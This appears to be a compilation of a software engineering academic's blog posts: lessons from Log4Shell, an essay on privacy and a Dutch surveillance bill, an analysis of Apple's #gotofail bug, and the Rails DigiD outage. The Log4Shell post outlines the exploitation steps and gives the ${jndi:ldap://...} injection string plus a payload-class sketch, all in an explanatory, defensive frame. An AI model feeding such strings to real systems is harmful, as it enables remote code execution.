Log4Shell: Lessons Learned for Software Architects

This week, the log4shell vulnerability in the Apache log4j library was discovered (CVE-2021-44228). Exploiting this vulnerability is extremely simple, and log4j is used in many, many software systems that are critical to society — a lethal combination. What are the key lessons you as a software architect can draw from this?

The vulnerability

In versions 2.0-2.14.1, the log4j library would take special action when logging messages containing "${jndi:ldap://LDAP-SERVER/a}": it would look up a Java class on the LDAP server mentioned, and execute that class.
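
To make this concrete, here is a minimal sketch of the target side, with a hypothetical handler class and parameter names: any log statement that includes attacker-controlled input is enough.

import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

// Hypothetical request handler; the userAgent argument is fully attacker-controlled.
// With log4j 2.0-2.14.1 on the classpath, logging it triggers the JNDI lookup
// as soon as the string contains a ${jndi:ldap://...} pattern.
public class SearchHandler {

    private static final Logger LOGGER = LogManager.getLogger(SearchHandler.class);

    public void handle(String query, String userAgent) {
        // Looks harmless, but log4j applies its message lookups to the formatted
        // message before writing it out.
        LOGGER.info("search for '{}' from client {}", query, userAgent);
    }
}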

This should of course never have been a feature, as it is almost the definition of a remote code execution vulnerability. Consequently, the steps to exploit a target system are alarmingly simple:

  1. Create a nasty class that you would like to execute on your target;
  2. Set up your own LDAP server somewhere that can serve your nasty class;
  3. "Attack" your target by feeding it strings of the form "${jndi:ldap://LDAP-SERVER/a}" where ever possible — in web forms, search forms, HTTP requests, etc. If you’re lucky, some of this user input is logged, and just like that your nasty class gets executed.

Interestingly, this recipe can also be used to make a running instance of a system immune to such attacks, in an approach dubbed logout4shell: if your nasty class actually wants to be friendly, it can programmatically disable remote JNDI execution, thus safeguarding the system against new attacks (until the system is restarted).

The source code for logout4shell is available on GitHub; it also illustrates how simple an attack is to mount.
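
The following is not the actual logout4shell code, but a much simplified sketch of the idea, assuming the payload class is loaded and instantiated inside the vulnerable JVM; whether the documented log4j2.formatMsgNoLookups switch takes effect immediately depends on how the running logging configuration was set up.

// Sketch of a "friendly" payload in the spirit of logout4shell (not its actual
// source). When the vulnerable JVM loads and instantiates this class via JNDI,
// the static initializer runs inside the target process.
public class FriendlyPayload {

    static {
        // Documented mitigation flag for log4j 2.10-2.14.1; it disables message
        // lookups such as ${jndi:...}. The real logout4shell payload goes further
        // and also patches the live logging configuration.
        System.setProperty("log4j2.formatMsgNoLookups", "true");
        System.err.println("log4j message lookups disabled until the next restart");
    }
}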

Under attack

As long as your system is vulnerable, you should assume you or your customers are under attack:

  1. Depending on the type of information stored or services provided, (foreign) nation states may use the opportunity to collect as much (confidential) information as possible, or infect the system so that it can be accessed later;
  2. Ransomware "entrepreneurs" are delighted by the log4shell opportunity. No doubt their investments in an infrastructure to scan systems for this vulnerability and ensure future access to these systems will pay off.
  3. Insiders, intrigued by the simplicity of the exploit, may be tempted to explore systems beyond their access levels.

All this calls for a system setup according to the highest security standards: deployments that are isolated as much as possible, access logs, and the ability to detect unwarranted changes (infections) to deployed systems.

Applying the Fix

Naturally, the new release of log4j, version 2.15, contains a fix. Thus, the direct solution for affected systems is to simply upgrade the log4j dependency to 2.15, and redeploy the patched system as soon as possible.

This may be more involved in some cases, due to backward incompatibilities that may have been introduced along the way. For example, in version 2.13 support for Java 7 was dropped. So if you’re still on Java 7, just upgrading log4j is not that simple (and you may have other security problems besides log4shell). If you’re still stuck with log4j 1.x (end-of-life since 2015), then log4shell isn’t a problem, but you have other security problems instead.

Furthermore, log4j is widely used in other libraries you may depend on, such as Apache Flink, Apache Solr, Neo4j, Elasticsearch, or Apache Struts: see the list of over 150 affected systems. Upgrading such systems may be more involved, for example if you’re a few versions behind or if you’re stuck with Java 7. Earlier, I described how upgrading a system using Struts, Spring, and Hibernate took over two weeks of work.

All this serves as a reminder of the importance of dependency hygiene: the need to ensure dependencies are at their latest versions at all times. Upgrading versions can be painful in case of backward incompatibilities. This pain should be swallowed as early as possible, and not postponed until the moment an urgent security upgrade is needed.
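
As a modest, hedged illustration of what such hygiene can look like in practice, the sketch below fails fast when the log4j version on the classpath is older than 2.15.0. It assumes the log4j-api jar's manifest carries an Implementation-Version entry (most Maven-built jars do); a real setup would rather rely on the build tool's dependency reports.

import org.apache.logging.log4j.LogManager;

// Rough classpath check: refuse to pass when log4j is older than 2.15.0.
// It inspects the log4j-api jar (log4j-core normally ships the same version)
// and relies on the Implementation-Version manifest entry, which may be absent
// for repackaged or shaded jars, so treat this as a sketch, not a guarantee.
public class Log4jVersionCheck {

    public static void main(String[] args) {
        String version = LogManager.class.getPackage().getImplementationVersion();
        System.out.println("log4j version on the classpath: " + version);
        if (version == null || !isAtLeast(version, 2, 15)) {
            System.err.println("log4j looks older than 2.15.0 - upgrade before deploying");
            System.exit(1);
        }
    }

    private static boolean isAtLeast(String version, int wantedMajor, int wantedMinor) {
        String[] parts = version.split("\\.");
        int major = Integer.parseInt(parts[0]);
        int minor = parts.length > 1 ? Integer.parseInt(parts[1]) : 0;
        return major > wantedMajor || (major == wantedMajor && minor >= wantedMinor);
    }
}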

Deploying the Fix

Deploying the fix yourself should be simple: with an adequate continuous deployment infrastructure, it is a push of a button, or happens automatically in reaction to a commit.

If your customers need to install an upgraded version of your system themselves, things may be harder. Here, investments in a smooth update process pay off, as does a disciplined versioning approach that encourages customers to update their systems regularly, with as few incompatibility roadblocks as possible.

If your system is a library, you’re probably using semantic versioning. Ideally, the upgrade’s only change is the upgrade of log4j, meaning your release can simply increment the patch version identifier. If necessary, you can consider backporting the patch to earlier major releases.

Your Open Source Stack

As illustrated by log4shell, most modern software stacks critically depend on open source libraries. If you benefit from open source, it is imperative that you give back. This can be in kind, by freeing your own developers to contribute to open source. A simpler approach may be to donate money, for example to the Apache Software Foundation. This can also buy you influence, to make sure the open source libraries develop the features you want, or conduct the security audits that you hope for.

The Role of the Architect

As a software architect, your key role is not to react to an event like log4shell. Instead, it is to design a system that minimizes the likelihood of such an event and its impact on the confidentiality, integrity, and availability of that system.

This requires investments in:

  • Maintainability: enforcing dependency hygiene and keeping dependencies current at all times, to minimize mean time to repair and maximize availability;
  • Deployment security: isolating components where possible and logging access, to safeguard confidentiality and integrity;
  • Upgradability: ensuring that those who have installed your system or who use your library can seamlessly upgrade to (security) patches;
  • The open source ecosystem: sponsoring the development of open source components you depend on, and contributing to their security practices.

To make this happen, you must guide the work of multiple people, including developers, customer care, operations engineers, and the security officer, and secure sufficient resources (including time and money) for them. Most importantly, this requires that you, as an architect, are an effective communicator at multiple levels, from developer to CEO, from engine room to penthouse.

A South African Perspective on Privacy and Intelligence

The Dutch government has proposed a new law on intelligence and security services (“Wet op de inlichtingen- en veiligheidsdiensten” — Wiv20XX).

As several privacy-related organizations have made clear, this law proposes non-specific (bulk) interception powers for any form of telecom or data transfer without independent ex-ante review or court involvement (see the summary by Matthijs Koot, and reactions on the bill by Bits of Freedom, Privacy International, the Institute for Information Law of the University of Amsterdam IVIR, and the Internet Society ISOC).

This bill gives the Dutch government unprecedented power to violate the privacy of its citizens. Either the Dutch government does not recognize the crucial role of privacy in a well-functioning democracy, or it does not realize what enormous privacy infringements are made possible through Internet surveillance.

[Book cover: The Soft Vengeance of a Freedom Fighter, by Albie Sachs]

When discussing the importance of privacy, I am always reminded of South Africa’s anti-apartheid activist Albie Sachs and his autobiography “The Soft Vengeance of a Freedom Fighter” (first published in 1990, and turned into a film in 2014).

As a law student at the University of Cape Town, Albie Sachs started fighting apartheid at the age of 17, in 1952. He was imprisoned from 1963-1964 (solitary confinement) and again in 1966, after which he was exiled from his home country South Africa.

In 1988, living in Maputo, Mozambique, he lost his right arm and an eye when his car was bombed by the South African secret police.

From 1991 until 1993, after Nelson Mandela’s release in 1990, Albie Sachs played a pivotal role in the negotiations leading to the new South African constitution.

In 1994 Nelson Mandela appointed him as judge of the highest court of South Africa, the Constitutional Court. He worked for the Truth and Reconciliation Commission between 1995 and 1998.

Albie Sachs wrote his Soft Vengeance in 1989. Nelson Mandela was still in prison, and the struggle against Apartheid was not won yet. Albie Sachs had just lost his arm and eye, and his book was his attempt to cope with his injuries.

For his recovery he was flown to a London hospital. He noticed that he was remarkably optimistic, and wondered why. Here is his reason (p.58):

“Perhaps part of my pleasure at being in this hospital room is that I am fairly sure it is not bugged. Sometimes I used to imagine my phone in Maputo being listened in to by at least three different secret services […]”

“Possibly my continuing sense of post-bomb euphoria comes from the fact that at least for the time being I am out of the net of hidden sensors, my spirit free from spying for the first time in three decades.”

He explains what it means to be surveilled:

“Ever since I was seventeen I have been politically active, I have lived with the notion that there are others accompanying every move I make, listening to every word I say.”

“Did the secret police really follow every up and down of my marriage, pick up the terms of our divorce, record automatically the names of our children even before they were entered in the birth register?”

And this gives rise to his dream for the future:

“I too have a dream, that there will one day be a world without police files, and bugged rooms, and tapped telephones, and intercepted mail, and that I will actually live in it.”

Albie Sachs is not alone in his dream. According to article 12 of the United Nations Universal Declaration of Human Rights, we all have a right to privacy:

“No one shall be subjected to arbitrary interference with his privacy, family, home or correspondence, nor to attacks upon his honour and reputation. Everyone has the right to the protection of the law against such interference or attacks.”

To date, the Internet has given us amazing possibilities to communicate with our family and friends, to search, read, and share information on almost any topic we find interesting, and to shop for almost any item we think we need. As a software engineering educator and researcher, I am proud to have played a tiny part in making this happen.

Unfortunately, the Internet can also be used as a place for massive surveillance activities, at levels that, for example, the South African apartheid regime could only have dreamed of. As a software engineer, I am terrified by the technical opportunities the Internet provides to governments wishing to know everything about their citizens.

A government aimed at drafting a modern intelligence bill should recognize this immense power, and take responsibility to safeguard the necessary privacy protection.

The Dutch government has failed to do so. It has proposed a bill with insufficient independent oversight, a bill that oppressive regimes, such as the former South African regime, would be happy to embrace.

Luckily, the present bill is still a draft. I sincerely hope that the final version will offer adequate privacy protection, and bring the world closer to the dream of Albie Sachs.

Learning from Apple’s #gotofail Security Bug

Yesterday, Apple announced iOS 7.0.6, a critical security update for iOS 7 — and an update for OS X / Safari is likely to follow soon (if you haven’t updated iOS yet, do it now).

The problem turns out to be caused by a seemingly simple programming error, now widely discussed as #gotofail on Twitter.

What can we, as software engineers and educators of software engineers, learn from this high impact bug?

The Code

A careful analysis of the underlying problem is provided by Adam Langley. The root cause is in the following code:

static OSStatus
SSLVerifySignedServerKeyExchange(SSLContext *ctx, bool isRsa, SSLBuffer signedParams,
                                 uint8_t *signature, UInt16 signatureLen)
{
    OSStatus        err;
    ...

    if ((err = SSLHashSHA1.update(&hashCtx, &serverRandom)) != 0)
        goto fail;
    if ((err = SSLHashSHA1.update(&hashCtx, &signedParams)) != 0)
        goto fail;
        goto fail;
    if ((err = SSLHashSHA1.final(&hashCtx, &hashOut)) != 0)
        goto fail;
    ...

fail:
    SSLFreeBuffer(&signedHashes);
    SSLFreeBuffer(&hashCtx);
    return err;
}

To any software engineer, the two consecutive goto fail lines will be suspicious. They are, and more than that. To quote Adam Langley:

The code will always jump to the end from that second goto, err will contain a successful value because the SHA1 update operation was successful and so the signature verification will never fail.

Not verifying a signature is exploitable. In the coming months, there will remain plenty of devices running older versions of iOS and OS X. These will remain vulnerable, and exploitable.

Brittle Software Engineering

When first seeing this code, I was once again struck by how incredibly brittle programming is. Just adding a single line of code can bring a system to its knees.

For seasoned software engineers this will not be a real surprise. But students and aspiring software engineers will have a hard time believing it. Therefore, sharing problems like this is essential, in order to create sufficient awareness among students that code quality matters.

Code Formatting is a Security Feature

When reviewing code, I try to be picky about details, including white space, tabs, and new lines. Not everyone likes me for that. I often wondered whether I was just annoyingly pedantic, or whether it was the right thing to do.

The case at hand shows that white space is a security concern. The correct indentation immediately shows something fishy is going on, as the final check now has become unreachable:

    if ((err = SSLHashSHA1.update(&hashCtx, &signedParams)) != 0)
        goto fail;
    goto fail;
    if ((err = SSLHashSHA1.final(&hashCtx, &hashOut)) != 0)
        goto fail;

Insisting on curly braces would highlight the fault even more:

    if ((err = SSLHashSHA1.update(&hashCtx, &signedParams)) != 0) {
        goto fail;
    }
    goto fail;
    if ((err = SSLHashSHA1.final(&hashCtx, &hashOut)) != 0)
        goto fail;

Indentation Must be Automatic

Because code formatting is a security feature, we must not do it by hand, but use tools to get the indentation right automatically.

A quick inspection of the sslKeyExchange.c source code reveals that it is not routinely formatted automatically: There are plenty of inconsistent spaces, tabs, and code in comments. With modern tools, such as Eclipse-format-on-save, one would not be able to save code like this.

Yet just forcing developers to use formatting tools may not be enough. We must also invest in improving the quality of such tools. In some cases, hand-made layout can make a substantial difference in the understandability of code. Perhaps current tools do not sufficiently acknowledge such needs, leading to under-use of today’s formatting tools.

Code Review to the Rescue?

Besides automated code formatting, critical reviews might also help. In the words of Adam Langley:

Code review can be effective against these sorts of bug. Not just auditing, but review of each change as it goes in. I’ve no idea what the code review culture is like at Apple but I strongly believe that my colleagues, Wan-Teh or Ryan Sleevi, would have caught it had I slipped up like this. Although not everyone can be blessed with folks like them.

While I fully subscribe to the importance of reviews, a word of caution is in place. My colleague Alberto Bacchelli has investigated how code review is applied today at Microsoft. His findings (published as a paper at ICSE 2013, and nicely summarized by Alex Nederlof as The Truth About Code Reviews) include:

There is a mismatch between the expectations and the actual outcomes of code reviews. From our study, review does not result in identifying defects as often as project members would like and even more rarely detects deep, subtle, or “macro” level issues. Relying on code review in this way for quality assurance may be fraught.

Automated Checkers to the Rescue?

If manual reviews won’t find the problem, perhaps tools can find it? Indeed, the present mistake is a simple example of a problem caused by unreachable code. Any computer science student will be able to write a (basic) “unreachable code detector” that would warn about the unguarded goto fail followed by more (unreachable) code (assuming parsing C is a ‘solved problem’).
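
To make that concrete, here is a deliberately naive sketch of such a check, written in Java and working on raw source lines rather than on a parsed control-flow graph (which is what real tools use). It flags a statement that follows a goto not guarded by an if or else on the preceding line; on the buggy sslKeyExchange.c it would flag exactly the code after the duplicated goto fail.

import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.util.List;

// Deliberately naive, line-based sketch of an unreachable-code check.
// A real detector works on the parsed control-flow graph; this one merely flags
// a statement that follows a goto which is not the body of an if/else,
// unless that statement is a label, a closing brace, or a preprocessor line.
public class ToyUnreachableCodeCheck {

    public static void main(String[] args) throws IOException {
        List<String> lines = Files.readAllLines(Paths.get(args[0]));
        for (int i = 0; i < lines.size(); i++) {
            String current = lines.get(i).trim();
            if (!current.matches("goto\\s+\\w+\\s*;")) {
                continue;
            }
            String previous = nonBlank(lines, i, -1);
            boolean guarded = previous.startsWith("if") || previous.startsWith("else");
            String next = nonBlank(lines, i, +1);
            boolean jumpTargetOrEnd = next.isEmpty() || next.startsWith("}")
                    || next.startsWith("#") || next.matches("\\w+\\s*:.*");
            if (!guarded && !jumpTargetOrEnd) {
                System.out.printf("line %d: code after unconditional '%s' looks unreachable%n",
                        i + 1, current);
            }
        }
    }

    // First non-blank trimmed line before (step = -1) or after (step = +1) index i.
    private static String nonBlank(List<String> lines, int i, int step) {
        for (int j = i + step; j >= 0 && j < lines.size(); j += step) {
            String s = lines.get(j).trim();
            if (!s.isEmpty()) {
                return s;
            }
        }
        return "";
    }
}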

Therefore, it is no surprise that plenty of commercial and open source tools exist to check for such problems automatically: Even using the compiler with the right options (presumably -Weverything for Clang) would warn about this problem.

Here, again, the key question is why such tools are not applied. The big problem with tools like these is their lack of precision, leading to too many false alarms. Forcing developers to wade through long lists of irrelevant warnings will do little to prevent bugs like these.

Unfortunately, this lack of precision is a direct consequence of the fact that unreachable code detection (like many other program properties of interest) is a fundamentally undecidable problem. As such, an analysis always needs to make a tradeoff between completeness (covering all suspicious cases) and precision (covering only cases that are certainly incorrect).

To understand the sweet spot in this trade off, more research is needed, both concerning the types of errors that are likely to occur, and concerning techniques to discover them automatically.

Testing is a Security Concern

As an advocate of unit testing, I wonder how the code could have passed a unit test suite.

Unfortunately, the testability of the problematic source code is very poor. In the current code, functions are long, and they cover many cases in different conditional branches. This makes it hard to invoke specific behavior, and to bring the functions into a state in which the given behavior can be tested. Furthermore, observability is low, especially since parts of the code deliberately obfuscate results to protect against certain types of attacks.

Thus, given the current code structure, unit testing will be difficult. Nevertheless, the full outcome can be tested, albeit at the system (not unit) level. Quoting Adam Langley again:

I coded up a very quick test site at https://www.imperialviolet.org:1266. […] If you can load an HTTPS site on port 1266 then you have this bug.

In other words, while the code may be hard to unit test, the system luckily has well defined behavior that can be tested.
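
As a hedged sketch of what such a system-level check can look like: a tiny client attempts a TLS handshake against a server that deliberately presents an invalid ServerKeyExchange signature, such as the test site above. A correct TLS implementation must abort the handshake; an implementation with the #gotofail bug completes it. The JDK's own TLS stack stands in here for whatever client library you actually want to test, so treat this purely as an illustration of the idea.

import javax.net.ssl.SSLHandshakeException;
import javax.net.ssl.SSLSocket;
import javax.net.ssl.SSLSocketFactory;

// System-level probe: the TLS client under test connects to a server that
// presents a deliberately broken ServerKeyExchange signature. Rejecting the
// handshake is the expected (safe) behavior; completing it indicates the bug.
// Host and port default to Adam Langley's test setup mentioned in the text.
public class GotoFailProbe {

    public static void main(String[] args) throws Exception {
        String host = args.length > 0 ? args[0] : "www.imperialviolet.org";
        int port = args.length > 1 ? Integer.parseInt(args[1]) : 1266;

        SSLSocketFactory factory = (SSLSocketFactory) SSLSocketFactory.getDefault();
        try (SSLSocket socket = (SSLSocket) factory.createSocket(host, port)) {
            socket.startHandshake();
            System.out.println("Handshake completed: this client did NOT verify the signature.");
        } catch (SSLHandshakeException expected) {
            System.out.println("Handshake rejected: this client verified the signature.");
        }
    }
}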

Coverage Analysis

Once there is a set of (system or unit level) tests, the coverage of these tests can be used as an indicator of (the lack of) completeness of the test suite.

For the bug at hand, even the simplest form of coverage analysis, namely line coverage, would have helped to spot the problem: since the problem consists of unreachable code, there is no way to achieve 100% line coverage.

Therefore, any serious attempt to achieve full statement coverage should have revealed this bug.

Note that trying to achieve full statement coverage, especially for security or safety critical code, is not a strange thing to require. For aviation software, statement coverage is required for criticality “level C”:

Level C:

Software whose anomalous behavior, as shown by the system safety assessment process, would cause or contribute to a failure of system function resulting in a major failure condition for the aircraft.

This is one of the weaker categories: For the catastrophic ‘level A’, even stronger test coverage criteria are required. Thus, achieving substantial line coverage is neither impossible nor uncommon.

The Return-Error-Code Idiom

Finally, looking at the full sources of the affected file, one of the key things to notice is the use of the return code idiom to mimic exception handling.

Since C has no built-in exception handling support, a common idiom is to insist that every function returns an error code. Subsequently, every caller must check this returned code, and include an explicit jump to the error handling functionality if the result is not OK.

This is exactly what is done in the present code: the err variable is set, checked, and returned for every function call, and if the result is not OK, the call is followed by (hopefully exactly one) goto fail.
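
For readers less familiar with the idiom, here is a small sketch of its shape, transposed to Java purely for illustration (the affected Apple code is C): every step returns a status code, every caller must test it and route to a single cleanup point, and one stray jump or missing check silently turns an error into success.

// Shape of the return-code idiom, transposed to Java for illustration only.
// Every operation yields a status code that the caller must check and propagate;
// a single unchecked call or stray jump turns an error into apparent success.
public class ReturnCodeIdiom {

    static final int OK = 0;
    static final int HASH_ERROR = -1;

    // Stand-in for a hashing step such as SSLHashSHA1.update(); fails on null input.
    static int updateHash(String chunk) {
        return chunk == null ? HASH_ERROR : OK;
    }

    // Mimics the structure of SSLVerifySignedServerKeyExchange: check, propagate,
    // and fall through to a single cleanup point that returns the last status.
    static int verify(String serverRandom, String signedParams) {
        int err;
        if ((err = updateHash(serverRandom)) != OK) return cleanup(err);
        if ((err = updateHash(signedParams)) != OK) return cleanup(err);
        // Further steps repeat exactly the same pattern; the Apple bug shows
        // how one duplicated jump bypasses all remaining checks.
        return cleanup(err);
    }

    static int cleanup(int err) {
        // Release buffers and other resources, then hand the status back.
        return err;
    }

    public static void main(String[] args) {
        System.out.println("all steps succeed -> " + verify("random", "params")); // 0
        System.out.println("second step fails -> " + verify("random", null));     // -1
    }
}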

Almost 10 years ago, together with Magiel Bruntink and Tom Tourwe, we conducted a detailed empirical analysis of this idiom in a large code base of an embedded system.

One of the key findings of our paper is that in the code we analyzed we found a defect density of 2.1 deviations from the return code idiom per 1000 lines of code. Thus, in spite of very strict guidelines at the organization involved, we found many examples of not just unchecked calls, but also incorrectly propagated return codes, or incorrectly handled error conditions.

Based on that, we concluded:

The idiom is particularly error prone, due to the fact that it is omnipresent as well as highly tangled, and requires focused and well-thought programming.

It is sad to see our results from 2005 confirmed today.


© Arie van Deursen, February 22, 2014.


EDIT February 24, 2014: Fixed incorrect use of ‘dead code detection’ terminology into correct ‘unreachable code detection’, and weakened the claim that any computer science student can write such a detector based on the reddit discussion.


Design for Upgradability and the Rails DigiD Outage

On January 9th, the Dutch DigiD system was taken offline for 9 hours. The reason was a vulnerability (CVE-2013-0155 and CVE-2013-0156) in the underlying Ruby on Rails framework. The vulnerability enables attackers to bypass authentication, inject SQL, perform a denial of service, or execute arbitrary code.

DigiD is a Dutch authentication system used by over 600 organizations, including the national tax administration. Over 9 million Dutch citizens have a DigiD account, which they must use for various interactions with the government, such as filing taxes electronically. The organization responsible for DigiD maintenance, Logius, decided to take DigiD offline when it heard about the vulnerability. It then updated the Rails system to a patched version. The total downtime of DigiD was about 9 hours (from 12:20 until 21:30). Luckily, it seems DigiD was never compromised.

The threat was real enough, though, as illustrated by the Bitcoin digital currency ecosystem: the Bitcoin currency exchange Vircurex actually was compromised. According to Vircurex, it was able to “deploy fixes within five minutes after receiving the notification from the Rails security mailing list.”

To better understand the DigiD outage, I contacted spokesman Michiel Groeneveld from Logius. He stated that (1) applying the fix was relatively easy, and that (2) most of the down time was caused by “extensively testing” the new release.

Thus, the real lesson to be learned here is that speed of upgrading is crucial to reduce downtime (ensure high availability) in case a third-party component turns out to have a security vulnerability. The software architect caring about both security and availability must apply design for upgradability (categorized under replaceability in ISO 25010).

Any upgrade can introduce incompatibilities. Even the patch for this Rails vulnerability introduced a regression. Design for upgradability is about dealing with such regressions. It involves:

  1. Isolation of dependencies on external components, for example through the use of wrappers or aspects, in order to reduce the impact of incompatibilities (a small wrapper sketch follows this list).

  2. Dependency hygiene, ensuring the newest versions of external components are used as soon as they are available (which is good security policy anyway). This helps avoid the accumulation of incompatibilities, which may cause updates to take weeks rather than minutes (or hours). Hot security fixes may even be unavailable for older versions: for Ruby on Rails, which is now in version 3.x, the most popular comment at the fix site was a telling “lots of love from people stuck on 2.3”.

  3. Test automation, in order to reduce the execution time of regression tests for the system working with the upgraded component. This will include end-to-end system tests, but can also include dedicated tests ensuring that the wrappers built meet the behavior expected from the component.

  4. Continuous deployment, ensuring that once the source code can deal with the upgraded library, the actual system can be deployed with the push of a button.
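
As a small illustration of point 1, here is a hedged sketch of such isolation (all class and method names are made up): application code talks only to its own interface, and a single adapter class touches the external library, so an incompatible upgrade is confined to that adapter.

// Minimal isolation sketch: application code depends only on the Audit
// interface; a single adapter touches the (hypothetical) third-party logger.
// An incompatible upgrade of the library then only affects the adapter.
public class IsolationSketch {

    interface Audit {
        void record(String event);
    }

    // Stand-in for an external library class whose API may change on upgrade.
    static class ThirdPartyLogger {
        void write(String level, String message) {
            System.out.println("[" + level + "] " + message);
        }
    }

    // The only place in the code base that knows about the third-party API.
    static class ThirdPartyAuditAdapter implements Audit {
        private final ThirdPartyLogger delegate = new ThirdPartyLogger();

        @Override
        public void record(String event) {
            delegate.write("INFO", event);
        }
    }

    public static void main(String[] args) {
        Audit audit = new ThirdPartyAuditAdapter();
        audit.record("user logged in");  // application code, upgrade-agnostic
    }
}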

None of these comes for free. In other words, the product owner should be willing to invest in these. It is the responsibility of the architect to make clear what the costs and benefits are, and what the risks are of not investing in isolation, dependency hygiene, test automation, and continuous deployment. In this explanation, the architect can point to additional benefits, such as better maintainability, but these may be harder to sell than security and availability.

This brings me to two research connections of this case.

The first relates to regression testing. A hot fix for a system that is down is a case where it actually matters how long the execution of an (automated) regression test suite takes: test execution time in this case equals downtime. Intuitively, test cases covering functionality for which Rails is not even used need not be executed. This is where the research area of selective regression testing comes in. The typical technique uses control flow analysis in order to reduce a large regression test suite given a particular change. This is classic software engineering research dating back to the 90s: for a representative article, have a look at Rothermel and Harrold’s Safe, Efficient Regression Test Selection Technique.
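
A toy sketch of the idea (the coverage data below is invented; real techniques derive it from control-flow or coverage analysis of a previous run): given which components changed, re-run only the tests whose recorded coverage touches them.

import java.util.List;
import java.util.Map;
import java.util.Set;
import java.util.stream.Collectors;

// Toy test selection: keep only the tests whose recorded coverage overlaps with
// the changed components. The mapping below is invented for illustration.
public class SelectiveRegressionTesting {

    public static void main(String[] args) {
        Map<String, Set<String>> coveredComponentsPerTest = Map.of(
                "LoginFlowTest", Set.of("authentication", "rails-params"),
                "TaxFormRenderTest", Set.of("forms", "pdf"),
                "SessionTimeoutTest", Set.of("authentication", "session"));

        Set<String> changedComponents = Set.of("rails-params");

        List<String> selected = coveredComponentsPerTest.entrySet().stream()
                .filter(e -> e.getValue().stream().anyMatch(changedComponents::contains))
                .map(Map.Entry::getKey)
                .sorted()
                .collect(Collectors.toList());

        // Only LoginFlowTest needs to run for this particular change.
        System.out.println("Tests selected for re-execution: " + selected);
    }
}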

Design for upgradability also relates to some of the research I’m involved in.
What an architect caring about upgradability can do is estimate the anticipated upgrading costs of an external component. This could be based on a library’s “compatibility reputation”. But how can we create such a compatibility rating?

At the time of writing, we are working on various metrics that use a library’s release history in order to predict API stability. We are using the (huge) maven repository to learn about breaking changes in libraries in the wild, and we are investigating to what extent encapsulation practices are effective. With that in place, we hope to be able to provide decision support concerning the maintainability costs of using third party libraries.

For our first results, have a look at our ICSM 2012 paper on Measuring Library Stability Through Historical Version Analysis — for the rest, stay tuned, as there is more to come.

EDIT (February 4, 2013)

For a more detailed account of the impact of the Rails vulnerabilities, have a look at What The Rails Security Issue Means For Your Startup by Patrick McKenzie. The many (sometimes critical) comments on that post are also an indication of how hard upgrading is in practice (“How does this help me … when I have a multitude of apps running some Rails 1.x or 2.x version?”).

An interesting connection with API design is provided by Ned Batchelder, who suggests renaming .load and .safe_load to .dangerous_load and .load, respectively (in a Python setting in which similar security issues exist).

EDIT (April 4, 2013)

As another (separate) example of an urgent security fix, today (April 4, 2013) the PostgreSQL Global Development Group has released a security update to all current versions of the PostgreSQL database system. The most important security issue fixed in this release, CVE-2013-1899, makes it possible to craft a connection request, containing a database name that begins with “-”, that can damage or destroy files within a server’s data directory.

Here again, all users of the affected versions are strongly urged to apply the update immediately, illustrating once more the need to be able to upgrade rapidly.